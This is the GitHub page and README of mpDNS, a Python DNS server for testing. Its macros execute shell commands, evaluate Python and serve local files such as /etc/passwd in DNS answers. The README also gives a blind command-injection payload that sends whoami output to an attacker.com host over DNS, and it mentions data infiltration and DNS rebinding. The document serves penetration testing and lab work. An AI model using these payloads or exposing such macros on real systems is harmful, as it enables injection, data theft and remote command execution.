Multi-Purpose DNS Server
Switch branches/tags
Nothing to show
Clone or download
Latest commit c571a8b Nov 17, 2018
Permalink
Failed to load latest commit information.
circuits Initial release Nov 4, 2018
dnslib Initial release Nov 4, 2018
LICENSE Initial release Nov 4, 2018
README.md Added: variables %PEER%, %QUERY% Nov 4, 2018
mpdns.py Bug fixes Nov 17, 2018
names.db Bug fixes Nov 17, 2018

README.md

mpDNS aka multi-purpose DNS Server

Simple, configurable "clone & run" DNS Server with multiple useful features

  • Should work on Python 2 and 3
  • names.db -> holds all custom records (see examples)
  • Simple wildcards like *.example.com
  • Catch unicode dns requests
  • Custom actions aka macro:
    • {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
    • {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
    • {{file::/etc/passwd}} -> Respond with localfile contents
    • {{resolve}} -> Forward DNS request to local system DNS
    • {{resolve::example.com}} -> Resolve example.com instead of original record
    • {{echo}} -> Response back with peer address
    • {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
  • Supported query types: A, CNAME, TXT
  • Update names.db records without restart/reload with ./mpdns.py -e

Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

Usage: ./mpdns.py

  • Edit names.db with ./mpdns.py -e no restart required

Offensive and Defensive purposes:

  1. You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
  2. Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
  3. Easily infiltrate 65K of data in one TXT query
  4. DNS Rebinding
  5. Execute custom macro action on specific query (useful in malware-analysis lab environments)
  6. And lots more. It is highly customizable.

Installing

git clone https://github.com/nopernik/mpDNS

Limitations

  1. Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
    this limitation applies to TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
    therefore TXT record with macro {{file:localfile.txt}} is limited to 65200 bytes.
  2. No support for nested wildcards test.*.example.com
  3. No support for custom DNS server resolver in {{resolve::example.com}} macro
  4. TTL always set to 0

Examples

names.db example:

# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but still can be catched by the server.
# for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response

passwd.example.com	TXT     {{file::/etc/passwd}}  #comments are ignored
shellexec			TXT     {{shellexec::whoami}}
eval				TXT     {{eval::import random; res = random.randint(1,500)}}
resolve1			A       {{resolve}}
resolve2			A       {{resolve::self}}      #same as previous
resolve3			A       {{resolve::example.com}}
blabla.com			A       5.5.5.5

*					A       127.0.0.1
*.example.com		A		7.7.7.7
c1.example.com		CNAME	c2.example.com
c2.example.com		CNAME	c3.example.com
c3.example.com		CNAME	google.example.com
google.example.com	CNAME	google.com
test.example.com	A		8.8.8.8
google.com			A		{{resolve::self}}
notgoogle.com		A		{{resolve::google.com}}

Example output with names.db example:

Regular resolution from DB: dig test.example.com @localhost

;; ANSWER SECTION:
test.example.com.	0	IN	A	8.8.8.8

mpDNS output: - Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)


Recursive CNAME resolution: dig c1.example.com @localhost

;; QUESTION SECTION:
;c1.example.com.			IN	A

;; ANSWER SECTION:
c1.example.com.		0	IN	CNAME	c2.example.com.
c2.example.com.		0	IN	CNAME	c3.example.com.
c3.example.com.		0	IN	CNAME	google.example.com.
google.example.com.	0	IN	CNAME	google.com.
google.com.		0	IN	A	216.58.206.14

mpDNS output:

- Request from 127.0.0.1:44120      -> c1.example.com.		-> c2.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c2.example.com		-> c3.example.com (CNAME)
- Request from 127.0.0.1:44120      -> c3.example.com		-> google.example.com (CNAME)
- Request from 127.0.0.1:44120      -> google.example.com	-> google.com (CNAME)
- Request from 127.0.0.1:44120      -> google.com			-> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost

;; ANSWER SECTION:
not-in-db.com.		0	IN	A	127.0.0.1

mpDNS output: - Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)


Wildcard subdomain resolution: dig wildcard.example.com @localhost

;; ANSWER SECTION:
wildcard.example.com.	0	IN	A	7.7.7.7

mpDNS output: - Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)


Forward request macro: dig google.com @localhost

;; ANSWER SECTION:
google.com.		0	IN	A	172.217.22.110

mpDNS output: - Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)


Forward request of custom domain macro: dig notgoogle.com @localhost

;; ANSWER SECTION:
notgoogle.com.		0	IN	A	172.217.22.110

mpDNS output: - Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)


File contents macro via TXT query: dig txt passwd.example.com @localhost

;; ANSWER SECTION:
passwd.example.com.	0	IN	TXT	"root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"

mpDNS output: - Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)


Custom python code macro via TXT query: dig txt eval @localhost

;; ANSWER SECTION:
eval.			0	IN	TXT	"320"

mpDNS output: - Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)


Shell command macro via TXT query: dig txt shellexec @localhost

;; ANSWER SECTION:
shellexec.		0	IN	TXT	"root"

mpDNS output: - Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)


Have fun!